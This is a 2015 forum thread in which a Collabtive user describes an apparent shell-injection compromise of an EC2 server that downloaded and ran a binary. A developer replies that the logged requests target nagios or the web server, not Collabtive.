Page 1 of 1

Some sort of injection attack

PostPosted: 15.04.2015, 15:56
by Baaleos
So - I host my Collabtive instance in Amazon EC2.
Today I got a shock when I discovered that since installing Collabtive my instance has somehow been churning out 8GB of data per hour.
(About $80 for the last 4-5 days)

I initially thought it was something to do with a build script that was being used by Jenkins - hosted on the same instance, but when reviewing my apache2 access logs I found what looks like a shell injection through collabtive.

Basically, somehow the GET request to apache2 was able to perform a curl and wget on a URL, download a linux binary, and then start it.
They also messed around with IP Tables etc

I just figured I should post this here, as it may or may not be a vulnerability with Collabtive.
Note: Collabtive was installed following a guide I found online.

Re: Some sort of injection attack

PostPosted: 17.04.2015, 02:19
by Philipp
I dont think this is related to Collabtive.

A couple of points here:
1. I cant see in those HTTP requests where any part (script) that belongs to Collabtive is being handed any data that could be injected somewhere at all.
In fact all requests seem to go to the / (root) path of the (sub)domain.
So while this may run on the subdomain you have configured Collabtive on, Collabtive doesnt seem to be involved.

2. Most of those GET requests seem to be probing for some version of nagios plugins. Probably to exploit those.

3. The offending request seems to be some kind of shell exploit that uses wget etc indeed.
However, even if Collabtive was involved - there is no code in Collabtive that can call any shell commands or run strings on the system console otherwhise (like wget). So Collabtive generally is not vulnerable to these sorts of attack.

So this seems to be an attack on your apache server, nagios or some other part of your stack rather than Collabtive.